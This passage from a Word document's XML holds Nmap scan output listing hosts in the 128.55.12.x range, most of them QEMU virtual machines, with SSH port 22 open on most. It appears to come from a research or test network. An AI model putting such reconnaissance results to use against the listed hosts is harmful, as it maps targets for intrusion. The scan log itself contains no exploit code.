    <w:p w14:paraId="4DB242AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB51535" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB5FBB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09945BBC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 6C:2B:59:7E:48:24 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8FE3C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A21669C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A6668" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E787D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751FCED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60B2B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:77 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5042A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6DAD55" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F42E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6C4DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4AC1BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6D0F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:78 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA7542" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B31384C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4994DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E02F7C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A7C0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC57D38" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:82 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61DBA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7133AD4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BEF1C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160EF7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0AB50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648DD2D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:94 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459DB44" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363DAA54" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BC1E45" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E24164" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F36AC6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005418C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:98 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354764E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF5FCBC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED76DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5C976" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E9128" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53647B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:53 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464277F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F00D176" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-translate-2-dp (128.55.12.160)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D708571" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC1758" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD855E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864249C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:A0 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD3629" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5573934B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE67A43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED4A43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346B1B9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CE7B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: B4:99:BA:B0:36:AD (Hewlett Packard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F130D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEB8325" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212F086" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1F322" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF950DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp closed ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA035AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 60:38:E0:38:98:21 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563836AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45960B86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.171</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844DF82" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753F512B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1919E1C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp closed ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6316F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 60:38:E0:38:B1:FB (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD32905" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D97968" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C138DC2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532126F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA06B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF6A05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:AD (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF34B15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F945BD8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19942093" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2563B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3036D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC75F4F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:AE (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A05D80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402FBE75" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.225</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AA68DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E85E8BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E5734" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA44DBE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:AF (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647426D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CBFF40" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.226</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C282C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6DE571" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F080880" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023AF86F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:B0 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B597D50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23292861" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.227</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFED233" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D2DADF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72239006" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59592F6A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:C9 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7CCB73" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4795E1BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.228</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C018C70" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427585CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319AA62C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5AF44" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
